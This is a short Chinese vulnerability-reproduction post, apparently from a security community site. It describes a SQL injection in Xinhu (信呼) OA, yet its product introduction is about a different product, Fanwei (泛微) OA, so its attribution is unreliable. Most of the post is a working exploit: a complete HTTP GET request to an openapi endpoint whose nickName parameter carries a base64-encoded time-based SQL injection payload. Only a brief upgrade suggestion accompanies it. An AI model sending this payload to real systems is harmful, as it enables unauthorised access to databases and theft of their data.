更多网安漏洞复现,可前往无问社区查看http://wwlib.cn/index.php/artread/artid/16564.html
0x01 产品简介
泛微数字化运营管理平台OA为组织提供从“可信数字身份、电子化流程审批、个性化岗位信息门户、 知识文档管理、电子化签署到内外协同的业务管理”
0x02 漏洞概述
信呼OA办公系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。
建议升级到最新版本已修复
0x03 复现环境
payload:
GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36